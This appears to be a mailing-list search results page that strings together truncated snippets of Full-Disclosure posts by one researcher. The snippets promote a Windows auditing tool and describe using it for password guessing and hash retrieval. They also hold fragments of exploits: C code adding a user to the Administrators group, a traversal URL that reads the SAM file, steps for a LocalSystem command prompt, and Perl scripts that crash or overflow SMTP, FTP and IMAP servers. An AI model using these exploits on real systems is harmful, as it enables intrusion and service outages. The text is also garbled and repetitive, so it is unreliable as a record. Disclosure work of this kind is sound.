I have received a cease and desist letter regarding certain tools on
http://windowsaudit.com. Regardless of the validity of the
accusations, I do not have the financial means to support legal
defense.
With that said, please take this opportunity to download WinScanX
Basic or purchase WinScanX Pro
ONLY 5 days left!
In an effort to spread the word about WinScanX Pro, one of the best
Windows auditing tools around, substantial discounts are being offered
for the month of February.
=
Buy WinScanX Pro for just $10.00 (normally priced at $250.00)
WinScanX Pro can
WinScanX Pro is only $10.00 for the month of February (normally $250.00)
WinScanX Basic (always free - only scans one host per run)
http://www.windowsaudit.com/
Article tool: DCLookup.exe (source included)
http://windowsaudit.com/downloads/DCLookup.zip
Original article link:
For those of you that are using WinScanX Pro, you may find the need to
create an IP input file at some point so you can cover a large range
of hosts very quickly. The following script can help you to do just
that.
http://windowsaudit.com/downloads/CreateIPInputFile.zip
Usage:
- Unzip the
In an effort to spread the word about WinScanX Pro, one of the best
Windows auditing tools around, substantial discounts are being offered
for the month of February.
=
Buy WinScanX Pro for just $10.00 (normally priced at $250.00)
WinScanX Pro can potentially scan
Original article:
http://windowsaudit.com/winscanx/windows-account-password-guessing-with-winscanx/
WinScanX download (free): http://windowsaudit.com/
Watch the video: http://www.youtube.com/watch?v=i9ZI7A-IpDw
One of the most dangerous things you can do with WinScanX is lockout a
Windows account
Using WinScanX to retrieve Windows password hashes, LSA secrets and MS
CACHE hashes without copying a single file to the remote host. Read
on...
Video and WinScanX (free) download link at:
http://windowsaudit.com/winscanx/retrieving-password-hashes-with-winscanx-y/
Retrieving password hashes,
WinScanX was released today. A Windows command-line enumeration tool
plus an optional GUI front-end. A must have for any security
professional.
Download link: http://windowsaudit.com/downloads/WinScanX_Basic.zip
Web site: http://www.windowsaudit.com/
Features and usage information:
WinScanX
WinScanX was released today. A Windows command-line enumeration tool
plus an optional GUI front-end. A must have for any security
professional.
Download link: http://windowsaudit.com/downloads/WinScanX_Basic.zip
Web site: http://www.windowsaudit.com/
Features and usage information:
WinScanX
.zip
Source code included.
Tool homepage: http://reedarvin.thearvins.com/tools.html
Thank you,
Reed Arvin reedarvin_at_gmail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored
Source code included with both tools.
Thank you,
Reed Arvin reedarvin_at_gmail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
://reedarvin.thearvins.com/tools.html
Written by Reed Arvin [EMAIL PROTECTED].
Thank you,
Reed Arvin [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http
for PWDump2, PWDump3e, and LSADump2. So...thanks
to the creators of these tools for being generous enough to include
the source code with these tools so that hungry minds can learn new
things.
=
Tool homepage: http://reedarvin.thearvins.com/tools.html
Written by Reed Arvin [EMAIL PROTECTED].
Thank
routine. Included
source code for educational purposes.
=
Tool homepage: http://reedarvin.thearvins.com/tools.html
Written by the current and original author, Reed Arvin [EMAIL PROTECTED]
.
[EMAIL PROTECTED] (deprecated)
[EMAIL PROTECTED] (deprecated)
[EMAIL PROTECTED] (current and final
It appears that some of the characters in the previous post were not
HTML safe. The original article can be found at: a
href=http://reedarvin.thearvins.com/20060308-01.html;http://reedarvin.thearvins.com/20060308-01.html/a
___
Full-Disclosure - We
for years. Sorry
you wasted your time.
It's clear you were unaware of the previous research. You must have thought
it was pretty important, considering how many lists you cross posted to.
Thanks for your efforts.
Reed Arvin [EMAIL PROTECTED] wrote:
Sir,
On Windows 2000 operating systems
); system( szCmdLine ); printf( Adding user \Program\ to the local Administrators group...\n ); wsprintf( szCmdLine, %s\\system32\\net.exe localgroup Administrators Program /add, szWinDir );
system( szCmdLine ); return 0;}// = End Program.c ==Discovered by Reed Arvin reedarvin[at]gmail[dot]com
Sir,
On Windows 2000 operating systems the default permissions for the root
of the OS drive is Everyone/Full Control. However, with Microsoft
operating systems newer than Windows 2000 administrative privileges
are necessary. Thank you for your comment.
Regards,
Reed
On 12/22/05, Steven Rakick
file such as:
http://127.0.0.1:8081/Test/WINDOWS/repair/sam
The contents of the restricted file will be displayed thanks to the
LocalSystem account.
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
___
Full
of the LocalSystem account).
Click File, click Open.
8. Change Files of type: to All Files, navigate to the system32 directory and
locate cmd.exe. Right click cmd.exe and choose Open.
The result is a command prompt running under the context of the LocalSystem
account.
Discovered by Reed Arvin reedarvin
);
print $socket HELO . A x 512 . \r\n;
sleep(1);
print $socket MAIL FROM: . A x 512 . \r\n;
close($socket);
}
else
{
print Cannot connect to $ARGV[0]:25\n;
}
#= Start BusMail_SMTPDOS.pl =
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http
);
close($socket);
}
else
{
print Cannot connect to $ARGV[0]:21\n;
}
}
#= Start FTPShell_FTPDOS.pl =
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
Vulnerability discovered using PeachFuzz
(http
102400 . \r\n;
close($socket);
}
else
{
print Cannot connect to $ARGV[0]:21\n;
}
#= End Inframail_FTPOverflow.pl =
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com
connect to $ARGV[0]:143\n;
}
#= End IAeMailServer_DOS.pl =
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)
___
Full-Disclosure
;
close($socket);
}
else
{
print Cannot connect to $ARGV[0]:21\n;
}
#= End GoldenFTPServer_Overflow.pl =
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
___
Full-Disclosure - We believe in it.
Charter
of the
LocalSystem account.
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
directory and locate cmd.exe. Right click cmd.exe and choose Open.
The result is a command prompt running under the context of the
LocalSystem account.
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
___
Full-Disclosure - We
of type: to All Files, navigate to the system32
directory and locate cmd.exe. Right click cmd.exe and choose Open.
The result is a command prompt running under the context of the
LocalSystem account.
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
Assistance
28 matches
Mail list logo